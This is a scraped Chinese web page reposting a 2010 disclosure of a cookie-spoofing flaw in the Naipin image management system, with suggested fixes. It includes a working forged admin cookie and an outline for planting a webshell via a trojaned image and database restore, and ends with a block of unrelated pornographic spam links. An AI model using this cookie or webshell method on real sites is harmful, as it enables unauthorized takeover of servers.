<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關(guān)鍵字專題1關(guān)鍵字專題50關(guān)鍵字專題500關(guān)鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關(guān)鍵字專題關(guān)鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當(dāng)前位置: 首頁 - 科技 - 知識百科 - 正文

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞

        來源:懂視網(wǎng) 責(zé)編:小采 時間:2020-11-09 08:23:23
        文檔

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞:發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改
        推薦度:
        導(dǎo)讀耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞:發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改

        發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改Cookie拿到 管理

        發(fā)布日期:2010-10.08
        發(fā)布作者:redice

        影響版本:20100906 Access版
        官方地址:http://www.naipin.com/

        漏洞類型:Cookie欺騙
        漏洞描述:大概一年前我發(fā)現(xiàn)了《耐品圖片管理系統(tǒng)Access版》有Cookie欺騙漏洞:任意用戶可以通過修改Cookie拿到管理員權(quán)限。


        今年6月份我給耐品技術(shù)發(fā)了郵件,告知了這個漏洞,他們回復(fù)如下:

        ”您好,謝謝您的提醒!
        祝您合家幸福安康!“

        今天我下載了最新版(Naipin_T_20100906_acc.rar)進行了測試,發(fā)現(xiàn)這個漏洞仍然存在。
        既然官方如此不重視,我就它放出來。


        Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL

        利用上面的cookie不登錄也能拿到管理員權(quán)限...


        拿Webshell的一種思路:

        如果數(shù)據(jù)庫后綴名是asp的,可以采用該思路。上傳用戶圖像,上傳一張含有一句話木馬的圖片(采用edjpgcom工具)。
        進入后臺,使用數(shù)據(jù)庫恢復(fù)功能將上傳的圖片恢復(fù)為數(shù)據(jù)庫。

        修復(fù)方案:臨時修補辦法如下:

        (1)Admin_ChkLogin.asp第66行下增加如下代碼:
        session("GroupId")=Rs("GroupId")

        (2)將clsMain.asp的第112行改為如下代碼:
        UserGroupId=session("GroupID")

        (3)建議盡量做到:能寫入的目錄不給執(zhí)行權(quán)限,能執(zhí)行的目錄不給寫入權(quán)限。

        標(biāo)簽分類: cookie欺騙 驗證漏洞

        聲明:本網(wǎng)頁內(nèi)容旨在傳播知識,若有侵權(quán)等問題請及時與本網(wǎng)聯(lián)系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞:發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改
        推薦度:
        標(biāo)簽: 圖片 cookie 漏洞
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 美女视频黄a视频全免费| 噼里啪啦免费观看高清动漫4 | 国产免费一区二区三区不卡 | WWW亚洲色大成网络.COM| 日韩高清在线免费观看| 亚洲色偷偷色噜噜狠狠99| 免费高清在线爱做视频| 亚洲AV无码XXX麻豆艾秋| 国产一级理论免费版| 深夜福利在线视频免费| 区三区激情福利综合中文字幕在线一区亚洲视频1 | 免费人成再在线观看网站| 亚洲精品无码久久不卡| 久久一区二区三区免费| 亚洲国产精品福利片在线观看| 国产精品免费观看调教网| 亚洲综合综合在线| 无码视频免费一区二三区| 国产午夜亚洲精品不卡电影| 亚洲日韩在线第一页| 很黄很污的网站免费| 亚洲人成电影在线观看网 | 亚洲Av无码国产情品久久| 中文字幕不卡高清免费| 久久久久久亚洲精品成人| 大学生a级毛片免费观看| 免费一级全黄少妇性色生活片| 亚洲色欲久久久综合网| free哆啪啪免费永久| 亚洲av无一区二区三区| 亚洲色欲色欲www在线丝 | 国产成人精品日本亚洲18图| 国产男女性潮高清免费网站 | **一级一级毛片免费观看| 亚洲国产AV无码一区二区三区 | 亚洲精品国产电影午夜| 在线观着免费观看国产黄| 国产一区二区三区免费| 亚洲人成网站免费播放| 亚洲精品二区国产综合野狼| 亚洲成在人线aⅴ免费毛片|